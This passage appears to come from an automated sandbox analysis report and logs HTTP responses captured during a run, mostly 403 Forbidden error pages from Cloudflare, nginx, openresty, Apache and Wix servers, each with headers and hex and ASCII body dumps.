7e1d6bf21fca6993-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:23 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u0kdKRvAsUPiPoahFPD0%2FLMcuLjQpKN1O9U0I0%2B4lqJVtCRhrDOw%2BrhFQc7TZfr7T28ZDEmZnva%2FMk6eVBAXORkNWKlCTLVh6INkG6FvebTCSp%2FjHQgX%2BTYLqoJFndc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6bf348e96993-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:28 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YIA6SVd6pFy8cNE0w1w8NLho1FDSmLtUJprad4ApaqRZy65yBwFFkaW%2FNY8voV9RKJc25zJiDZf9IxWTyENAmy%2BD4qa%2Fa5AP1GOpZ9150dTgVZn0utYI%2BFHvcqiRnjE5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6c144acf905b-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1688537188.59387956604120316X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Wed, 05 Jul 2023 06:06:28 GMTX-Served-By: cache-mxp6942-MXPX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4JR7ha7iITn/sV2o9+Oy/IF,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:28 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xhw%2FlDO7YXY68hd3A8kz6yhHX1U7CRoFp3uMC3GLgKfZGceU1lgglG0PHHxKb%2FM1Qg2m1ikCmtf7ruZtjQ4sRMNTjsilYIQdD4s7a6sXmY23Ce7SEISLhG9rOAnihlx8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6c157bc1905b-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:06:43 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q97eRe22BkTzTC9B7ONSnmk0wehH8TX%2FhMej3Oz6uOJhvTwrZAVYuboME%2F5cE2N6MyVJnPQFH5Km1ZrpgSg5ZSvMBrRq6e8y%2F72EgidGDbBQ0WuxyJGFSsRDl0Nbhg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7e1d6c172e40380f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: 119c<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compati
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:29 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 05 Jul 2023 06:06:29 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:29 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/HMEnKR1XA+4gsPKvpF+JNj,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1688537189.5289352690116715X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=17X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 91a52e61-38bb-4882-841d-ac2caf6e9c10CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fFrEDpmAUZ%2FB1mXjDqRUZYGxLY%2FBisTdxw3arGr148NreyGBAyplLpURCjME9z%2F2p454qya1Qw82%2F1qEoKnsWGSquYZ2dU8O8ESzhWCnpA1T9QXvUi0M0WnDvplhrawBTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=147.000074Server: cloudflareCF-RAY: 7e1d6c262e051da8-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:06:26 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:33 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vpUZrZtcNCkq5%2BDN4vuKqFmwpUIZo6EoplByFLMSBPRB4J4lo75p0jyOtCogM9XImK965IQrOZ8bFA5mDVsoRE%2BhWWreyR9bl%2BrEAHajEN9zUoK5ICGIsshmWcw4tkBr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6c324e57046a-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:33 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c9G3P3bMkuBn147KgmwJ1yPCxoBa8uLzAFYUMoSQzWxjFyBTePvbRHNLw8yG2na3W9oQ37EY7qUbZETy05cY%2B8lltNjfCLUaeuOHm77y6Y9em7Om3iY2Eeyl9DK3RVV%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6c327e8a046a-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:33 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:34 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:35 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DJWqoRpeKh9luyuHI%2FIUZpswiOy4K6LQR3uYgpx0H62ERu2R2CQk4Y1q5daPiCyrbNSxaj1e3obDigRlRP3IL1iU1eh1ce8QLRsxla%2FkFJvuxDZMwo3AG6MB0USLUKSf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6c3ccef33606-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
